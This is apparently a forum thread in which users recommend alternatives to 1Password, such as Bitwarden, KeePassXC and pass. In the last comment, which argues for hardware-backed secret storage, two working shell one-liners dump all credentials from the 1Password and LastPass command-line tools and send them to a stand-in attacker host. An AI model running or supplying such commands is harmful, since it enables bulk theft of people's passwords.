Alternatives to 1Password

+1 to Bitwarden, and in particular the Vaultwarden implementation.

I've been self hosting it for a number of years now and have never had to think about it ever again - it works, has clients for all my platforms, never had any issues.

KeePassXC is the way to go. Install F-Droid on your Android smartphone, get KeePassDX. This way, you have a desktop and Android client.

I'd recommend setting a very strong password, with a key (you can generate one when you create the database) and a long decryption time.

If you need help setting strong passwords, I recommend EFF Dice-Generated Passphrases[1].

[1]: https://www.eff.org/dice

There's pass, a CLI password manager that's version controlled and encrypted with your PGP key: https://www.passwordstore.org/

There are also (unofficial) iOS and Android clients that sync to a git repo.

Bitwarden if you want a third-party managing your credentials, keepass if you're ok handling the syncing of your password database.

I wouldn't use any of the Kaspersky's software, as their owner, Eugene Kaspersky, is literally an ex-KGB officer (if there's such a thing as ex-KGB).

https://en.wikipedia.org/wiki/Eugene_Kaspersky

I’ve been looking at alternatives for a while, here are my notes: https://taoofmac.com/space/apps/1password

(In short, I’ve switched to Secrets while keeping an eye on new KeePass apps, because I don’t want to use or run any kind of service)

People say a lot of nice things abotu Bitwarden, and it's got both self-hosting and hosted options.

TIL 1Password are also looking into a self-hosted option; maybe it'll happen if more people sign on to their survey: https://survey.1password.com/self-host/.

There's a new kid in town: https://www.ctrlc.hu/~stef/blog/posts/sphinx.html

pro: it has much stronger security guarantees than the rest, it's self-hosted, but you can use other peoples servers!

cons: there is no UI frontend for macs, and UI integration in browser could also be improved.

(i'm the author, ama)

Can you use your browser's native password manager? Chrome supports syncing of passwords. Just dump a bunch of gibberish into the password field when you register and let the browser do the rest.

Last year, CtrlBlog reviewed these password savers and found KeePassXC to be usable for a self-hosted password saver server and widest-platform client usages.

- Windows

- KeePassXC Offline for Android

- iOS

- Linux

   I don’t need to use KeePass, though. There are over a dozen different forks of the KeePass project to choose from. I decided on KeePassXC for my Mac, Linux, and Windows computers; and KeePass2Android Offline for my Android phone. I decided on these two because they feel more modern and I’ve confirmed that they won’t easily suffer from synchronization conflicts.

https://www.ctrl.blog/entry/keepass-vs-bitwarden-server.html

Moved to Bitwarden + Vaultwarden. It's pretty good! Firefox plugin doesn't work in private browsing. Browser plugins don't auto-sync. Other than that, I was pretty happy to ditch 1password as Agile Bits circles the drain.

As there are many (and good) answers here, I may have missed one point - which I will raise: Check the fallback / fail scenario(s).

Here is my example: I've been using 1password since 2008ish. I've purchased every upgrade since then and even had more than one license. All was fine: Data was local, there was some backup method and some plain text export.

Some time ago, 1Password decided to go cloud and change to a subscription for using the software for new users. The client I have on my mac still works fine, but the only option was to "rent" the password management that stored my data on their servers.

The owners sugarcoated this in every way (pet peeve: Talking in their mails about something completly different like recipes, then "by the way, subscription only in 3,2,1 ...").

I will not buy into being fully dependent on someone else when it comes to access to all of my online and offline systems. And you should not, too. Same goes for any company.

So any of the suggested tools here should do two things: Work independent on an online/sync-connection (and be able to access/modify data untill online connection has been reestablished). And be able to export data in a format that can be transformed/read by most of the others.

I switched to my own local instance of Bitwarden (Vaultwarden) and use the client for any device I own. Switch took about half a day and I never looked back.

For enterprise setups I use vaultwarden (a rust based open source bitwarden). Can do password sharing and so on

For personal use keepassxc and syncthing. Keepassdx on android.

Edit: enterprise is self hosted. Keepassxc with syncthing doesn't need hosting

I made my own.

After trying for a test period the usual famous ones, and not being happy with anything (cloud crap, no memory encrypt, no clipboard cleaning - to just name a few) I decided to take a look at a few that were open source, learned their overall intricacies and started to code my own. At beginning nothing fancy, just a SQLite DB and simply focus on name field, system-wide shortcut for my manager to pop-up and then selecting the entry. Manager would type in the username, TAB to password field, then type the password there as well and press ENTER. That was the most rudimentary one and whenever some new web/app was not working I would see why and increase from there its code/logic.

After like 3 months I was happy with all I had the need for and very rarely, something like every 6 months, I would touch its code for maximum 2 days to make it work. It's being over 5 years at this point and use it daily on my several dozens web sites / desktop apps I need. During this time I never did a full refactoring or change its underlying business logic.

So my advice for you @vasachi, if you can, do the same. The satisfaction will be huge.

Apple’s password management is getting better and now includes 2FA. I wouldn’t be surprised to see it spun out as a separate app sometime soon.

Use https://www.lesspass.com/#/ - I've found the approach very fresh. Of course, you have to be sure that master password is not leaked, but the same is true for any stateful password manager.

The real problem though is that it does not support hardware security tokens at the moment.

Passbolt is open source and can be self hosted if you don't want (or can) run their cloud version.

https://www.passbolt.com/

It's gully open source, with a AGPL license.

https://github.com/passbolt/

I’ve been using CodeBook for several years and have been pretty happy with it. One time cost (per OS) and can sync over WiFi or to Dropbox/google drive. No browser plugins, instead it provides a global hot key activation which authenticates you (Touch ID or password), lets you search for the account then auto-types the password. On iPhone it integrates well for providing passwords to sites and they just recently added a feature which will also auto-copy 2FA TOTP into clipboard if one exists.

https://www.zetetic.net/codebook/

I use gopass and Gopass Bridge for password filling in firefox. It works great, and for the keys I'm using yubikeys gpg mode, so my passwords are actually locked with a hardware key.

I’ve been using an app called Secrets for iOS and macOS for close to a year. A one time purchase, easy syncing, and other items like secure notes and software licenses can be stored. They also have import from 1Password. Excellent experience so far, almost a complete 1:1 analog of 1Password. Command + \ to auto-populate fields works, maybe not as smoothly. For the money Secrets charges I’m satisfied knowing that after a year, I’m saving.

KeePass is open source and has many 3rd parties clients.

https://keepass.info/download.html

It supports having a key file on top of password.

It has plugins to import from 1password too:

https://keepass.info/plugins.html

Does anyone have an opinion on Enpass' trustworthiness? It's pretty sleek, and with wifi sync I don't even need a server/cloud provider... But being a commercial application I'm not sure how to weigh its security. It also seems the last public audit is from 2018.

Shameless plug, and I don't sell them anymore (but you can build your own): https://finalkey.net/ is a hardware dongle that stores passwords on-device, rather than on some server online.

This impulse to block the Russian people from using western products is really gross, IMO. What have the Russian people done to anyone? Governments are to blame for the horrors going on in Ukraine. Not some oppressed citizen who has no say in the matter.

I love my setup, (It's not Free).

KeePass with the database file hosted on Dropbox

on my Macbook I use Strongbox on my iPhone also use Strongbox

Strongbox supports biometric auth, and is really nice to use, and supports having the keepass database on many different cloud providers

I used KeePass/KeePassXC/KeePassium with iCloud Drive. This setup works, but it's cumbersome to sync. I'm migrating to iCloud Passwords right now.

I'm wondering what HN thoughts are for SafeInCloud? I don't sync passwords ever, but I'm curious as to the feedback from the HN community in general.

Pass and Keepassxc. I don’t trust online websites.

I've been using BitWarden. It is perfect.

Log into another country’s app store? Is this no longer possible? Not that I would ever support using 1Password though.

Keepass is what I use now. It has variants for windows, macOS, Linux, iOS, and probably Android but I haven’t seen it.

http://upm.sourceforge.net/

Did you try the Aurora store, which is independent of the "location" based Google account/store?

How secure is 1Password? I have been using it for 4 months. Should I switch to Bitwarden?

I've been using Dashlane for a few years and I'm very happy with the service.

I'm afraid there is nothing public we can trust in today's world. We see how big companies are just throwing away their users and data. So, watch to pass (CLI password manager) or KeePassXC as they sync nothing but store local, which means they can't beat you.

Forefox Sync works for me.

https://clipperz.is/

I use bitwarden.

- Open Source

- Great apps

- Great chrome & firefox addon

Passbolt

My leading contender is KeePassXC. https://keepassxc.org

Just use Google's password manager. Especially if you use Android and Chrome.

So convenient and Google is trustworthy to that extent.

It is non obvious but important to understand that most password managers, such as 1password, Lastpass, and almost everything else, expose all secrets to malware in plain text any time the password database is unlocked.

Here are some trivial examples of how malware can steal credentials in bulk.

Example: Exfiltrate all plaintext credentials from 1password

``` op list items | jq -r '.[].uuid' | xargs -n1 bash -c 'op get item "$1"' -- | curl -F 'p=<-' https://attacker.com >/dev/null 2>&1 ```

Example: Exfiltrate all plaintext credentials from lastpass

``` lpass ls | grep -oP '(?<=id: )([0-9]+)' | xargs -n1 bash -c 'lpass ls | grep "id: $1]"; lpass show $1' -- | curl -F 'p=<-' https://attacker.com >/dev/null 2>&1 ```

I have seen fake password manager browser plugins deployed in the wild that phish and exfiltrate master passwords, though the above methods are even simpler as they could just run a loop waiting until a password manager is eventually unlocked.

Software-only password managers may be useful for casual personal use cases such as food delivery services or social media accounts, but are not recommended for any use cases that protect any significant value like production corporate systems, and in particularly not for high risk secrets such as cloud root account creds, TLS CAs, or crypto-asset keys (you know who you are).

I would strongly encourage for most use cases to consider secret management solutions that decrypt one credential at a time on external hardware such as Password Store backed with a Yubikey, Trezor password manager, or a Mooltipass.

These offer damage control even when your endpoint is compromised.